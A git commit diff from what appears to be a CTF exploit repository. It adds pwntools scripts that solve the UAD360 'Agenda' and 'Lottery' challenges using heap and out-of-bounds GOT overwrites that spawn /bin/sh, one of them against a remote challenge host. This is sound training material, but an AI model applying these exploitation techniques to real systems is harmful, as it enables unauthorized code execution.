Exploits upload

Agenda and lottery challenges from UAD360.

Author: KaoRz

README.md

@@ -9,7 +9,9 @@
 | babypwn - CODEGATE 2017 | [babypwn exploit](../master/babypwn_CODEGATE_2017/exploit.py) |
 | Smasher - HackTheBox exploit WITH LEAK | [Smasher exploit](../master/smasher_exploit_hackthebox/leak/exploit.py) |
 | Smasher - HackTheBox exploit WITHOUT LEAK | [Smasher exploit](../master/smasher_exploit_hackthebox/no_leak/exploit.py) |
-| PWN - Old Bridge HackTheBox challenge | [Old Bridge exploit](..//master/oldbridge_hackthebox_challenge/oldbridge_HTB.zip) |
+| PWN - Old Bridge HackTheBox challenge | [Old Bridge exploit](../master/oldbridge_hackthebox_challenge/oldbridge_HTB.zip) |
+| Lottery - UAD360 CTF | [Lottery exploit](../master/lottery_UAD360/exploit.py) |
+| Agenda - UAD360 CTF | [Agenda exploit](../master/agenda_UAD360/exploit.py) |
 
 | Vulnerabilities | Exploit |
 | --- | --- |

agenda_UAD360/agenda_main

@@ -0,0 +1,64 @@
+#!/usr/bin/python
+from pwn import *
+
+context.terminal = ['tmux', 'sp', '-h']
+# context.log_level = 'DEBUG'
+
+elf  = ELF('./agenda_main_patched')
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+
+io = process(elf.path)
+
+def add_note(size, content):
+    io.recvuntil('Selecciona una opcion>')
+    io.sendline('1')
+    io.recvuntil('Longitud del evento:')
+    io.sendline(str(size))
+    io.recvuntil('Introduce el evento:')
+    io.sendline(content)
+
+def print_note(index):
+    io.recvuntil('Selecciona una opcion>')
+    io.sendline('2')
+    io.recvuntil('Indica el evento:')
+    io.sendline(str(index))
+
+def edit_note(index, content):
+    io.recvuntil('Selecciona una opcion>')
+    io.sendline('3')
+    io.recvuntil('Indica el evento:')
+    io.sendline(str(index))
+    io.recvuntil('Introduce el evento:')
+    io.send(content)
+
+def free_note(index):
+    io.recvuntil('Selecciona una opcion>')
+    io.sendline('4')
+    io.recvuntil('Indica el evento:')
+    io.sendline(str(index))
+
+for i in range(11):
+    add_note(10, str(ord('A') + i) * 10)
+
+free_note(2)
+free_note(1)
+edit_note(0, 'X' * 32 + p64(elf.got['free']))
+
+add_note(10, 'L' * 10)
+add_note(10, '')
+print_note(12)
+
+io.recvline()
+leak_free = u64(p64(libc.sym['free'])[:1] + io.recv(8)[1:])
+libc.address = leak_free - libc.sym['free']
+log.success('Leaked free@@GLIBC address: ' + hex(leak_free))
+log.success('GLIBC base address: ' + hex(libc.address))
+
+log.info('Spawning shell...')
+edit_note(0, '/bin/sh\x00')
+edit_note(12, p64(libc.sym['system']))
+free_note(0)
+
+io.recv()
+io.interactive()
+io.close()

agenda_UAD360/exploit.py

@@ -0,0 +1,47 @@
+from pwn import *
+
+elf  = ELF('./lottery_main_patched')
+local = False
+HOST = '34.253.120.147'
+PORT = 2324
+
+context.terminal = ['tmux', 'sp', '-h']
+
+if local == False:
+	libc = ELF('./libc-2.24-level1.so', checksec=False)
+	io = remote(HOST, PORT)
+else:
+	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
+	io = process(elf.path)
+
+def leak():
+	io.sendline('2')
+	io.sendlineafter('show:', '-11')
+	io.recvuntil('number: ')
+	lower_half = int(io.recvuntil('\n', drop=True))
+	io.recvuntil('tickets: ')
+	higher_half = int(io.recvuntil('\n', drop=True))
+	higher_half = higher_half << (4 * (len(hex(lower_half)) - 2))
+	io.recvuntil('option>')
+
+	return higher_half + lower_half
+
+def write(what, where):
+	io.sendline('1')
+	io.sendlineafter('edit:', str(int(where)))
+	io.sendlineafter('number:', str(int(what & 0x00000000ffffffff)))
+	io.sendlineafter('bought:', str(int(what & 0xffffffff00000000) >> 4 * 8))
+	io.sendlineafter('option>', '/bin/sh')
+
+leaked_atoi = leak()
+libc.address = leaked_atoi - libc.sym['atoi']
+
+log.success('Leaked atoi@@GLIBC address: ' + hex(leaked_atoi))
+log.info('GLIBC base address: ' + hex(libc.address))
+log.info('System@@GLIBC address: ' + hex(libc.sym['system']))
+
+write(libc.sym['system'], -11)
+io.recv()
+
+io.interactive()
+io.close()